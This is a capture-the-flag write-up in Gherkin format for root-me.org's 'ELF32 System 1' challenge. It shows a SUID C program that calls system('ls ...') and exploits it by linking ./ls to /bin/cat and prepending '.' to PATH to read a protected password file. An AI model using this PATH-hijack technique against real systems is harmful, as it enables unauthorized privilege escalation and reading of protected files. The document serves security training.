## Version 2.0
## language: en

Feature: elf32-system-1-app-script-root-me
  Code:
    elf32-system-1
  Site:
    root-me.org
  Category:
    app-script
  User:
    jgalzateg
  Goal:
    Get the password from the file .passwd

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali GNU/Linux  | 2020.3      |
    | Brave Browser   | 1.14.84     |

  Machine information:
    Given the url challenge
    """
    https://www.root-me.org/en/Challenges/App-Script/ELF32-System-1
    """
    Then enter in the site
    And find the credentials to access by a SSH connection
    """
    access SSH: ssh -p 2222 app-script-ch11@challenge02.root-me.org
    host: challenge02.root-me.org
    port: 2222
    user: app-script-ch11
    pass: app-script-ch11
    """
    And this script in C
    """
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
      setreuid(geteuid(), geteuid());
      system("ls /challenge/app-script/ch11/.passwd");
      return 0;
    }
    """
    Then I open a terminal to access the host
    And I login into de system
    And see that is running on Ubuntu (Bionic) 18.04

  Scenario: Success: symbolic-link
    Given I am logged in the machine through SSH
    Then I use ls -al command to see the files and his permissions
    """
    dr-xr-x---  2 app-script-ch11-cracked app-script-ch11 4096 2019 .
    drwxr-xr-x 17 root                    root            4096 2020 ..
    -r--------  1 app-script-ch11-cracked app-script-ch11   14 2012 .passwd
    -r--r-----  1 app-script-ch11-cracked app-script-ch11  494 2019 Makefile
    -r-sr-x---  1 app-script-ch11-cracked app-script-ch11 7252 2019 ch11
    -r--r-----  1 app-script-ch11-cracked app-script-ch11  187 2019 ch11.c
    """
    Then I see that I can't modify the code of the script to use cat command
    And I see that I can execute it
    And I see that the script have SUID permission
    Then I create a folder where I have permisions to write
    """
    drwxrwx-wt  11 root root 2166784 Oct 21 04:27 tmp
    app-script-ch11@challenge02:/$ mkdir /tmp/acls
    """
    Then I create the symbolic link in the folder
    And change the environment variable to the current path
    """
    app-script-ch11@challenge02:/tmp/acls$ ln -s /bin/cat ./ls
    app-script-ch11@challenge02:/tmp/acls$ export PATH=".:$PATH"
    """
    Then I execute the script to use the ls command in the path that I create
    And solved the challenge
    And I caught the flag
